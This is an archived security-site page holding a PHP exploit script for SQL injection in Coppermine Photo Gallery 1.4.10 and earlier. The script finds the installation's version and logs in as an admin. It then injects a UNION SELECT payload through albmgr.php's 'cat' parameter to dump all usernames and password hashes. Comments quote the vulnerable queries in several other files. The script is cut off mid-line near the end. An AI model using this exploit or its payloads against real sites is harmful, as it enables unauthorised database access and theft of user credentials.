TUCoPS :: Web :: Apps :: c07-1673.htm

Coppermine Photo Gallery <= 1.4.10 SQL Injection Exploit
Coppermine Photo Gallery <= 1.4.10 SQL Injection Exploit
Coppermine Photo Gallery <= 1.4.10 SQL Injection Exploit


#!/usr/bin/php
  ";
	print "\nProxyOptions..:  ";
print "\nExample.......: php xpl.php http://c.com/ admin passwd"; 
	print "\n---------------------------------------------------------\n";
	exit(1);
}


/*/
[0] => xpl.php [1] => http://localhost/cpg1410/ 
  [2] => root            [3] => toor
  [4] => localhost:8200  [5] => user:passwd
/*/
$url=$argv[1];$adu=$argv[2];
$adp=$argv[3];$pxs=$argv[4];
$pxa=$argv[5];

$xpl = new phpsploit();
$xpl->agent("InternetExploiter");
$xpl->cookiejar(1);
$xpl->allowredirection(1);

print "\nheader> ===============================================";
print "\nheader> Coppermine Photo Gallery 1.4.10 (SQL Injection)";
print "\nheader> ===============================================";

if(!empty($pxs)){
	print "\nstatus> Using a proxy $pxs";
	$xpl->proxy($pxs);
}

if(!empty($pxa)){
	print "\nstatus> Basic proxy authentification $pxa";
	$xpl->proxyauth($pxa);
}


/*/
  Table prefix.
/*/
print "\nstatus> Searching the version";
$xpl->get($url.'include/index.html');
if(preg_match("#Coppermine version: ([0-9]*\.[0-9]*\.[0-9]*)#",$xpl->getcontent(),$matches)) print "\nsploit> Coppermine version ".$matches[1];
else print "\nsploit> Not found";
$table = !empty($matches[1]) ? 'cpg'.str_replace('.','',$matches[1]).'_users' : 'cpg1410_users';


/*/
  If you have the admin cookie (but not the password),
  replace lines 73=>76 by $xpl->addcookie('yourcookie');
/*/
print "\nstatus> Trying to get logged in";
$xpl->post($url."login.php?referer=index.php","username=$adu&password=$adp&remember_me=1&submitted=Se+Connecter");
if(!preg_match("#color:red#",$xpl->getcontent())) print "\nsploit> Done";
else die("\nstatus> Exploit failed\n");


/*/
  (usermgr.php)
  ============  case 'group_alb_access' :
  if (isset($_GET['gid']))  $group_id = $_GET['gid'];
  $sql = "SELECT group_name  FROM [...] WHERE group_id = $group_id [...]";
  $result = cpg_db_query($sql);
  
  (db_ecard.php)
  =============  $start = isset($_REQUEST['start']) ? $_REQUEST['start'] : '';  [...]
  if (!$start) {$startFrom = '0';}else{$startFrom=$start;}  [...]
  $result = cpg_db_query("SELECT [...] ORDER BY $sortBy $sortDirection LIMIT $startFrom,$countTo");
  
  (albmgr.php)
  ===========  $cat = isset($_GET['cat']) ? ($_GET['cat']) : 0;
  if ($cat == 1) $cat = 0;
  if (GALLERY_ADMIN_MODE) {
  $result = cpg_db_query("SELECT [...] WHERE category = $cat ORDER BY pos ASC");
  
  (filename_to_title())
  ====================  $albumid = (isset($_POST['albumid'])) ? $_POST['albumid'] : 0;
  $albstr = ($albumid) ? " WHERE aid = $albumid" : ''; [...]
  $result = cpg_db_query("SELECT * FROM {$CONFIG['TABLE_PICTURES']} $albstr");
  
  (del_titles())
  =============  $albumid = (isset($_POST['albumid'])) ? $_POST['albumid'] : 0;
  $albstr = ($albumid) ? " WHERE aid = $albumid" : '';
  $result = cpg_db_query("SELECT * FROM {$CONFIG['TABLE_PICTURES']} $albstr");
/*/
print "\nstatus> Retrieving all members password";
$xpl->get($url."albmgr.php?cat=-1/**/union/**/select/**/user_name,user_password/**/from/**/$table/*");
if(preg_match_all("#

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH